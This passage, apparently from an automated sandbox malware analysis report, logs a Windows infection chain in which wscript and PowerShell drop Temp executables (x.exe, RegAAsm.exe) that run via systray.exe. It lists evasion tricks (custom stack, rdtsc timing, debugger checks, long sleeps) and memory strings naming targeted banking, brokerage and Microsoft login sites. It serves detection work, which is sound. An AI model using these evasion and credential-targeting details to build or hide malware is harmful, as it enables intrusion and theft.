              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00007FF848AC00BD pushad ; iretd 4_2_00007FF848AC00C1
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_007D31D0 push eax; ret 5_2_007D31D2
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_007EA9C9 pushad ; retf 5_2_007EAA00
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_007E7D8E push FFFFFFC9h; retf 5_2_007E7D90
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_007DD6C1 push ebp; ret 5_2_007DD6C2
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_007EEFF2 push cs; iretd 5_2_007EEFFB
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013D09AD push ecx; mov dword ptr [esp], ecx5_2_013D09B6
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeCode function: 8_2_015EC858 push cs; iretd 8_2_015EC861
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeCode function: 8_2_015F0308 push es; ret 8_2_015F0310
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeCode function: 8_2_015E326F push esi; ret 8_2_015E3271
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeCode function: 8_2_015E822F pushad ; retf 8_2_015E8266
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeCode function: 8_2_015E55F4 push FFFFFFC9h; retf 8_2_015E55F6
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeCode function: 8_2_015E3E0E push es; ret 8_2_015E3E17
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04DA09AD push ecx; mov dword ptr [esp], ecx9_2_04DA09B6
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_02BC77F6 pushad ; retf 9_2_02BC782D
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_02BCF440 push eax; ret 9_2_02BCF450
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_02BC4BBB push FFFFFFC9h; retf 9_2_02BC4BBD
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_02BC2836 push esi; ret 9_2_02BC2838
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_02BCBE1F push cs; iretd 9_2_02BCBE28
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04BBC454 push ds; iretd 9_2_04BBC47C
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04BBB687 pushfd ; ret 9_2_04BBB688
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04BBC753 push ss; iretd 9_2_04BBC761
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04BC0084 pushfd ; ret 9_2_04BC0087
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04BBF16D push esp; ret 9_2_04BBF17D
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_04BBFD74 push ecx; iretd 9_2_04BBFDC2
              Source: x.exe.2.drStatic PE information: section name: 1ZG(oi< entropy: 7.992884789281061
              Source: RegAAsm.exe.4.drStatic PE information: section name: .text entropy: 7.996319502854974
              Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\user\AppData\Local\Temp\RegAAsm.exeJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Switches to a custom stack to bypass stack traces
              Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
              Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
              Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
              Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
              Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
              Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
              Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
              Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
              Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 1E10000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 1BE50000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0144D1C0 rdtsc 5_2_0144D1C0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3414Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2356Jump to behavior
              Source: C:\Windows\SysWOW64\systray.exeWindow / User API: threadDelayed 459Jump to behavior
              Source: C:\Windows\SysWOW64\systray.exeWindow / User API: threadDelayed 9513Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeAPI coverage: 0.8 %
              Source: C:\Windows\SysWOW64\systray.exeAPI coverage: 3.1 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6536Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6784Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6600Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2352Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exe TID: 4052Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\systray.exe TID: 5560Thread sleep count: 459 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\systray.exe TID: 5560Thread sleep time: -918000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\systray.exe TID: 5560Thread sleep count: 9513 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\systray.exe TID: 5560Thread sleep time: -19026000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_02BCCA20 FindFirstFileW,FindNextFileW,FindClose,9_2_02BCCA20
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: at8-FI0k.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: at8-FI0k.9.drBinary or memory string: discord.comVMware20,11696428655f
              Source: at8-FI0k.9.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: at8-FI0k.9.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: at8-FI0k.9.drBinary or memory string: global block list test formVMware20,11696428655
              Source: at8-FI0k.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: wscript.exe, 00000000.00000003.2236811410.0000019EA7BEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2239947092.0000019EA9DC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2238574754.0000019EA7BEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2235955514.0000019EA7BEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: at8-FI0k.9.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: at8-FI0k.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: at8-FI0k.9.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: at8-FI0k.9.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: at8-FI0k.9.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: at8-FI0k.9.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: at8-FI0k.9.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: at8-FI0k.9.drBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: at8-FI0k.9.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: x.exe, 00000004.00000002.2208489039.000000000166B000.00000004.00000020.00020000.00000000.sdmp, HDIZeRcLxXsNvd.exe, 00000008.00000002.3362913628.0000000001419000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000009.00000002.3362471676.00000000030C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: at8-FI0k.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: at8-FI0k.9.drBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: at8-FI0k.9.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: at8-FI0k.9.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: at8-FI0k.9.drBinary or memory string: AMC password management pageVMware20,11696428655
              Source: at8-FI0k.9.drBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: at8-FI0k.9.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: at8-FI0k.9.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: at8-FI0k.9.drBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: at8-FI0k.9.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: at8-FI0k.9.drBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: at8-FI0k.9.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: at8-FI0k.9.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: at8-FI0k.9.drBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: at8-FI0k.9.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: at8-FI0k.9.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: firefox.exe, 0000000A.00000002.2965937171.00000231554DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@@
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_0144D1C0 rdtsc 5_2_0144D1C0
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_007E7B63 LdrLoadDll,5_2_007E7B63
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01464144 mov eax, dword ptr fs:[00000030h]5_2_01464144
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01464144 mov eax, dword ptr fs:[00000030h]5_2_01464144
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01464144 mov ecx, dword ptr fs:[00000030h]5_2_01464144
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01464144 mov eax, dword ptr fs:[00000030h]5_2_01464144
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_01464144 mov eax, dword ptr fs:[00000030h]5_2_01464144
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CB136 mov eax, dword ptr fs:[00000030h]5_2_013CB136
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CB136 mov eax, dword ptr fs:[00000030h]5_2_013CB136
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 5_2_013CB136 mov eax, dword ptr fs:[00000030h]5_2_013CB136
